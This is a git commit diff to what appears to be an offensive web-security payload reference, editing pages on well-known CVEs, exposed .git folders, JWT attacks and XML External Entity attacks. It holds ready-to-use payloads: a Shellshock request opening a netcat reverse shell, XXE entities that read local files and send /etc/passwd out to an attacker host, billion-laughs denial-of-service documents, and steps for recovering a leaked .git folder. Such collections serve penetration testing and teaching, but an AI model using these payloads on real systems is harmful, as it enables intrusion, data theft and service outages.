Attacks details + Summary JWT + XXE adjustments
parent
928a454531
commit
521d61d956
|
@ -1,16 +1,29 @@
|
|||
# Common Vulnerabilities and Exposures
|
||||
|
||||
Big CVEs in the last 5 years.
|
||||
|
||||
## CVE-2014-0160 - Heartbleed
|
||||
|
||||
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
|
||||
|
||||
## CVE-2014-6271 - Shellshock
|
||||
|
||||
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
|
||||
|
||||
```bash
|
||||
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
|
||||
```
|
||||
|
||||
## CVE-2017-5638 - Apache Struts 2
|
||||
|
||||
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
|
||||
|
||||
## CVE-2018-7600 - Drupalgeddon 2
|
||||
|
||||
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
|
||||
|
||||
## Thanks to
|
||||
* http://heartbleed.com
|
||||
* https://en.wikipedia.org/wiki/Shellshock_(software_bug)
|
||||
|
||||
* [Heartbleed - Official website](http://heartbleed.com)
|
||||
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
|
||||
* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
|
||||
|
|
|
@ -16,10 +16,16 @@
|
|||
|
||||
The following examples will create either a copy of the .git or a copy of the current commit.
|
||||
|
||||
Check for the following files, if they exist you can extract the .git folder.
|
||||
|
||||
- .git/config
|
||||
- .git/HEAD
|
||||
- .git/logs/HEAD
|
||||
|
||||
### Github example with a .git
|
||||
|
||||
1. Check 403 error (Forbidden) for .git or even better : directory listing
|
||||
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
|
||||
1. Check 403 error (Forbidden) for .git or even better : a directory listing
|
||||
2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
|
||||
```powershell
|
||||
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
|
||||
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
|
||||
|
|
|
@ -2,6 +2,11 @@
|
|||
|
||||
> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
|
||||
|
||||
- JWT Format
|
||||
- JWT Signature - None algorithm
|
||||
- JWT Signature - RS256 to HS256
|
||||
- Breaking JWT's secret
|
||||
|
||||
## JWT Format
|
||||
|
||||
JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
|
||||
|
@ -139,3 +144,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
|||
- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
|
||||
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
|
||||
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
|
||||
|
|
|
@ -1,10 +1,11 @@
|
|||
# XML External Entity
|
||||
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities.
|
||||
XML entities can be used to tell the XML parser to fetch specific content on the server.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic Test
|
||||
Basic XML external entity test, the result should contain "John" in `firstName` and "Doe" in `lastName`.
|
||||
|
||||
```xml
|
||||
<!--?xml version="1.0" ?-->
|
||||
|
@ -67,14 +68,16 @@ Classic XXE Base64 encoded
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
|
||||
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
|
||||
]>
|
||||
<foo>&xxe;</foo>
|
||||
```
|
||||
|
||||
## Deny of service
|
||||
|
||||
Deny Of Service - Billion Laugh Attack
|
||||
**Warning** : These attacks will disable the service or the server, do not use them on the Prod.
|
||||
|
||||
Billion Laugh Attack
|
||||
|
||||
```xml
|
||||
<!DOCTYPE data [
|
||||
|
@ -103,8 +106,12 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
|||
|
||||
## Blind XXE - Out of Band
|
||||
|
||||
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
|
||||
|
||||
### Blind XXE
|
||||
|
||||
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
|
@ -146,13 +153,17 @@ File stored on http://127.0.0.1/dtd.xml
|
|||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
|
||||
```
|
||||
|
||||
### XXE Inside SOAP
|
||||
### XXE inside SOAP
|
||||
|
||||
```xml
|
||||
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
||||
<soap:Body>
|
||||
<foo>
|
||||
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
|
||||
</foo>
|
||||
</soap:Body>
|
||||
```
|
||||
|
||||
### XXE Inside DOCX file
|
||||
### XXE inside DOCX file
|
||||
|
||||
Format of an Open XML file (inject the payload in any .xml file):
|
||||
|
||||
|
|
Loading…
Reference in New Issue